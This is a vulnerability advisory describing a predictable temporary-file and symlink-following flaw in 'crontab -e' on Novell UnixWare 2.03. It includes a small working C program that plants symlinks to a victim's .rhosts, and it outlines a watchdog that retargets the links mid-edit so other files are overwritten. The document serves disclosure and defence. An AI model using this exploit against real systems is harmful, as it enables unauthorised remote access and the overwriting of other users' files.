COMMAND

    crontab

SYSTEMS AFFECTED

    Novell  UnixWare  2.03  (UNIX  System  V Release 4.2 MP), possibly
    other versions of UnixWare.

PROBLEM

    The 'crontab -e' command creates a temporary file in /tmp to  pass
    the crontab file to a text editor for editing. The name of the file
    is easily guessable: it appears to be based on the process ID (e.g.
    /tmp/crontaba00421).

    'crontab -e' doesn't check if the file already exists in /tmp  and
    will gladly follow any symbolic links there might be waiting.

    A malicious  user can  create a  bunch of  symbolic links  in /tmp
    with a  little C  program, if  he knows  that someone  is going to
    edit his/her crontab file. The code might be something like this:

#include <stdio.h>
#include <unistd.h>

char *foo="0123456789ABCDEF";

int main ( void )
{
  char *ps1, *ps2, s[32];

  /* guess the last two characters of the PID-based name */
  for (ps1=foo;*ps1;ps1++)
    for (ps2=foo;*ps2;ps2++) {
      sprintf(s,"/tmp/crontaba002%c%c",*ps1,*ps2);
      symlink("/home/joe/.rhosts",s);
    }
  return 0;
}

    Now when joe edits his crontab file, it will be saved  as  .rhosts
    in his home directory. This is dangerous, because  crontab  files
    often include characters like '*', which act as  a  wildcard  in
    .rhosts.

    The victim doesn't have to be joe. A malicious user might build  a
    watchdog which replaces the symbolic link with a new  one  (e.g.
    pointing at /home/sam/.rhosts) while a user is editing his crontab
    file (a watchdog which looks for processes like 'crontab -e'  and
    'pico /tmp/crontab*').

    By replacing the symbolic link while the user is editing the crontab
    file, a malicious user might also be able to  overwrite  any  file
    owned by that user.